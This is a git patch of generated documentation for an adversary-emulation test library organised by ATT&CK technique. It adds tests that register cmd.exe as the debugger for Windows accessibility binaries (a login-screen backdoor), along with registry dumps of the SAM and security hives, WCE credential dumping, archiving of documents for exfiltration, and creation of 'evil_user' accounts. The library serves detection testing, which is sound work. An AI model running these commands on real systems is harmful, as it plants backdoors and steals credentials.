From 4bb3db16076854f6cd223a818d15d0c226099654 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 31 May 2018 14:09:33 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=T1015-adds --- atomics/T1002/T1002.md | 6 ++ atomics/T1003/T1003.md | 9 ++- atomics/T1007/T1007.md | 2 +- atomics/T1015/T1015.md | 126 ++++++++++++++++++++++++++++++++++++++- atomics/T1028/T1028.md | 2 +- atomics/T1033/T1033.md | 2 +- atomics/T1048/T1048.md | 2 +- atomics/T1053/T1053.md | 4 +- atomics/T1087/T1087.md | 5 ++ atomics/T1130/T1130.md | 6 ++ atomics/T1136/T1136.md | 6 ++ atomics/index.md | 16 ++++- atomics/windows-index.md | 16 ++++- 13 files changed, 187 insertions(+), 15 deletions(-) diff --git a/atomics/T1002/T1002.md b/atomics/T1002/T1002.md index 7dd3c69c70..e9619594e8 100644 --- a/atomics/T1002/T1002.md +++ b/atomics/T1002/T1002.md @@ -48,6 +48,12 @@ TODO **Supported Platforms:** Windows +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| input_file | Path that should be compressed into our output file | Path | *.docx| +| output_file | Path where resulting compressed data should be placed | Path | exfilthis.rar| + #### Run it with `powershell`! ``` rar a -r #{output_file} #{input_file} diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md index 89257bca16..f75b91da1f 100644 --- a/atomics/T1003/T1003.md +++ b/atomics/T1003/T1003.md @@ -187,6 +187,11 @@ http://www.ampliasecurity.com/research/windows-credentials-editor/ **Supported Platforms:** Windows +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Path where resulting data should be placed | Path | output.txt| + #### Run it with `command_prompt`! ``` wce -o #{output_file} @@ -195,7 +200,7 @@ wce -o #{output_file}
## Atomic Test #4 - Registry dump of SAM, creds, and secrets -Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated +Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7 **Supported Platforms:** Windows @@ -203,7 +208,7 @@ via three registry keys. Then processed locally using https://github.com/Neohaps #### Run it with `command_prompt`! ``` -reg save HKLM\sam sam +reg save HKLM\sam sam reg save HKLM\system system reg save HKLM\security security ``` diff --git a/atomics/T1007/T1007.md b/atomics/T1007/T1007.md index 7b9f05e11a..edfdfb3666 100644 --- a/atomics/T1007/T1007.md +++ b/atomics/T1007/T1007.md @@ -28,7 +28,7 @@ Identify system services #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| servicename | Name of service to start stop, query | string | svchost.exe| +| service_name | Name of service to start stop, query | string | svchost.exe| #### Run it with `command_prompt`! ``` diff --git a/atomics/T1015/T1015.md b/atomics/T1015/T1015.md index f2e51cc561..7afccc501d 100644 --- a/atomics/T1015/T1015.md +++ b/atomics/T1015/T1015.md @@ -32,12 +32,132 @@ Contributors: Paul Speulstra, AECOM Global Security Operations Center + +## Atomic Test #1 - Attaches Command Prompt As Debugger To Process - osk +This allows adversaries to execute the attached process + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| target_executable | File You Want To Attach cmd To | String | osk.exe| + +#### Run it with `command_prompt`! +``` +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f +``` +
+
+ +## Atomic Test #2 - Attaches Command Prompt As Debugger To Process - sethc +This allows adversaries to execute the attached process + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| target_executable | File You Want To Attach cmd To | String | sethc.exe| + +#### Run it with `command_prompt`! +``` +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f +``` +
+
+ +## Atomic Test #3 - Attaches Command Prompt As Debugger To Process - utilman +This allows adversaries to execute the attached process + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| target_executable | File You Want To Attach cmd To | String | utilman.exe| + +#### Run it with `command_prompt`! +``` +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f +``` +
+
+ +## Atomic Test #4 - Attaches Command Prompt As Debugger To Process - magnify +This allows adversaries to execute the attached process + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| target_executable | File You Want To Attach cmd To | String | magnify.exe| + +#### Run it with `command_prompt`! +``` +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f +``` +
+
+ +## Atomic Test #5 - Attaches Command Prompt As Debugger To Process - narrator +This allows adversaries to execute the attached process + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| target_executable | File You Want To Attach cmd To | String | narrator.exe| + +#### Run it with `command_prompt`! +``` +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f +``` +
+
+ +## Atomic Test #6 - Attaches Command Prompt As Debugger To Process - DisplaySwitch +This allows adversaries to execute the attached process + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| target_executable | File You Want To Attach cmd To | String | DisplaySwitch.exe| + +#### Run it with `command_prompt`! +``` +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f +``` +

-## Atomic Test #1 - Attaches Command Prompt As Debugger To Process +## Atomic Test #7 - Attaches Command Prompt As Debugger To Process - AtBroker This allows adversaries to execute the attached process **Supported Platforms:** Windows @@ -46,7 +166,7 @@ This allows adversaries to execute the attached process #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| target_executable | File You Want To Attach To | String | osk.exe| +| target_executable | File You Want To Attach cmd To | String | atbroker.exe| #### Run it with `command_prompt`! ``` diff --git a/atomics/T1028/T1028.md b/atomics/T1028/T1028.md index 51cb9e74ab..93be88be2a 100644 --- a/atomics/T1028/T1028.md +++ b/atomics/T1028/T1028.md @@ -53,7 +53,7 @@ https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-applicatio #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| computername | Name of Computer | string | computer1| +| computer_name | Name of Computer | string | computer1| #### Run it with `command_prompt`! ``` diff --git a/atomics/T1033/T1033.md b/atomics/T1033/T1033.md index 8e54198ec2..e958a32057 100644 --- a/atomics/T1033/T1033.md +++ b/atomics/T1033/T1033.md @@ -40,7 +40,7 @@ Identify System owner or users on an endpoint #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| computername | Name of remote computer | strong | computer1| +| computer_name | Name of remote computer | strong | computer1| #### Run it with `command_prompt`! ``` diff --git a/atomics/T1048/T1048.md b/atomics/T1048/T1048.md index a786bd3102..9f79b02e2c 100644 --- a/atomics/T1048/T1048.md +++ b/atomics/T1048/T1048.md @@ -34,7 +34,7 @@ Remote to Local |------|-------------|------|---------------| | domain | target SSH domain | url | target.example.com| | user_name | username for domain | string | atomic| -| passowrd | password for user | string | atomic| +| password | password for user | string | atomic| #### Run it with `sh`! ``` diff --git a/atomics/T1053/T1053.md b/atomics/T1053/T1053.md index f075a9b736..f008f18398 100644 --- a/atomics/T1053/T1053.md +++ b/atomics/T1053/T1053.md @@ -83,8 +83,8 @@ Create a task on a remote system | task_command | What you want to execute | String | C:\windows\system32\cmd.exe| | time | What time 24 Hour | String | 72600| | target | Target | String | localhost| -| UserName | Username DOMAIN\User | String | DOMAIN\user| -| Password | Password | String | At0micStrong| +| user_name | Username DOMAIN\User | String | DOMAIN\user| +| password | Password | String | At0micStrong| #### Run it with `command_prompt`! ``` diff --git a/atomics/T1087/T1087.md b/atomics/T1087/T1087.md index bafe8e68fa..123a2c15a1 100644 --- a/atomics/T1087/T1087.md +++ b/atomics/T1087/T1087.md @@ -118,6 +118,11 @@ xxx **Supported Platforms:** Linux, macOS +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Path where captured results will be placed | Path | ~/loot.txt| + #### Run it with `sh`! ``` lastlog > #{output_file} diff --git a/atomics/T1130/T1130.md b/atomics/T1130/T1130.md index 8b991777cd..821e57764e 100644 --- a/atomics/T1130/T1130.md +++ b/atomics/T1130/T1130.md @@ -45,6 +45,12 @@ Creates a root CA with openssl **Supported Platforms:** Linux +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key| +| cert_filename | Path of the CA certificate we create | Path | rootCA.crt| + #### Run it with `sh`! ``` openssl genrsa -out #{key_filename} 4096 diff --git a/atomics/T1136/T1136.md b/atomics/T1136/T1136.md index 34004b92b6..3008de58e5 100644 --- a/atomics/T1136/T1136.md +++ b/atomics/T1136/T1136.md @@ -46,6 +46,12 @@ Creates a user on a MacOS system with dscl **Supported Platforms:** macOS +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | Username of the user to create | String | evil_user| +| realname | 'realname' to record when creating the user | String | Evil Account| + #### Run it with `bash`! ``` dscl . -create /Users/#{username} diff --git a/atomics/index.md b/atomics/index.md index 0bf6845bd3..ecb4219558 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -3,7 +3,13 @@ - [T1156 .bash_profile and .bashrc](./T1156/T1156.md) - Atomic Test #1: .bash_profile and .bashrc [macos, linux] - [T1015 Accessibility Features](./T1015/T1015.md) - - Atomic Test #1: Attaches Command Prompt As Debugger To Process [windows] + - Atomic Test #1: Attaches Command Prompt As Debugger To Process - osk [windows] + - Atomic Test #2: Attaches Command Prompt As Debugger To Process - sethc [windows] + - Atomic Test #3: Attaches Command Prompt As Debugger To Process - utilman [windows] + - Atomic Test #4: Attaches Command Prompt As Debugger To Process - magnify [windows] + - Atomic Test #5: Attaches Command Prompt As Debugger To Process - narrator [windows] + - Atomic Test #6: Attaches Command Prompt As Debugger To Process - DisplaySwitch [windows] + - Atomic Test #7: Attaches Command Prompt As Debugger To Process - AtBroker [windows] - [T1182 AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) - [T1103 AppInit DLLs](./T1103/T1103.md) - Atomic Test #1: Install AppInit Shim [windows] @@ -240,7 +246,13 @@ - [T1134 Access Token Manipulation](./T1134/T1134.md) - Atomic Test #1: Access Token Manipulation [windows] - [T1015 Accessibility Features](./T1015/T1015.md) - - Atomic Test #1: Attaches Command Prompt As Debugger To Process [windows] + - Atomic Test #1: Attaches Command Prompt As Debugger To Process - osk [windows] + - Atomic Test #2: Attaches Command Prompt As Debugger To Process - sethc [windows] + - Atomic Test #3: Attaches Command Prompt As Debugger To Process - utilman [windows] + - Atomic Test #4: Attaches Command Prompt As Debugger To Process - magnify [windows] + - Atomic Test #5: Attaches Command Prompt As Debugger To Process - narrator [windows] + - Atomic Test #6: Attaches Command Prompt As Debugger To Process - DisplaySwitch [windows] + - Atomic Test #7: Attaches Command Prompt As Debugger To Process - AtBroker [windows] - [T1182 AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) - [T1103 AppInit DLLs](./T1103/T1103.md) - Atomic Test #1: Install AppInit Shim [windows] diff --git a/atomics/windows-index.md b/atomics/windows-index.md index 64a58d7b09..5e72a8a1bc 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -84,7 +84,13 @@ - [T1134 Access Token Manipulation](./T1134/T1134.md) - Atomic Test #1: Access Token Manipulation [windows] - [T1015 Accessibility Features](./T1015/T1015.md) - - Atomic Test #1: Attaches Command Prompt As Debugger To Process [windows] + - Atomic Test #1: Attaches Command Prompt As Debugger To Process - osk [windows] + - Atomic Test #2: Attaches Command Prompt As Debugger To Process - sethc [windows] + - Atomic Test #3: Attaches Command Prompt As Debugger To Process - utilman [windows] + - Atomic Test #4: Attaches Command Prompt As Debugger To Process - magnify [windows] + - Atomic Test #5: Attaches Command Prompt As Debugger To Process - narrator [windows] + - Atomic Test #6: Attaches Command Prompt As Debugger To Process - DisplaySwitch [windows] + - Atomic Test #7: Attaches Command Prompt As Debugger To Process - AtBroker [windows] - [T1182 AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) - [T1103 AppInit DLLs](./T1103/T1103.md) - Atomic Test #1: Install AppInit Shim [windows] @@ -119,7 +125,13 @@ # persistence - [T1015 Accessibility Features](./T1015/T1015.md) - - Atomic Test #1: Attaches Command Prompt As Debugger To Process [windows] + - Atomic Test #1: Attaches Command Prompt As Debugger To Process - osk [windows] + - Atomic Test #2: Attaches Command Prompt As Debugger To Process - sethc [windows] + - Atomic Test #3: Attaches Command Prompt As Debugger To Process - utilman [windows] + - Atomic Test #4: Attaches Command Prompt As Debugger To Process - magnify [windows] + - Atomic Test #5: Attaches Command Prompt As Debugger To Process - narrator [windows] + - Atomic Test #6: Attaches Command Prompt As Debugger To Process - DisplaySwitch [windows] + - Atomic Test #7: Attaches Command Prompt As Debugger To Process - AtBroker [windows] - [T1182 AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) - [T1103 AppInit DLLs](./T1103/T1103.md) - Atomic Test #1: Install AppInit Shim [windows]